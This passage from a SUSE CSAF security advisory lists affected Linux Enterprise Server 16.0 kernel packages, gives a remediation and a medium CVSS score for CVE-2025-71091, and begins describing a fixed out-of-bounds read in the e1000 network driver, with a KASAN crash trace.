"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 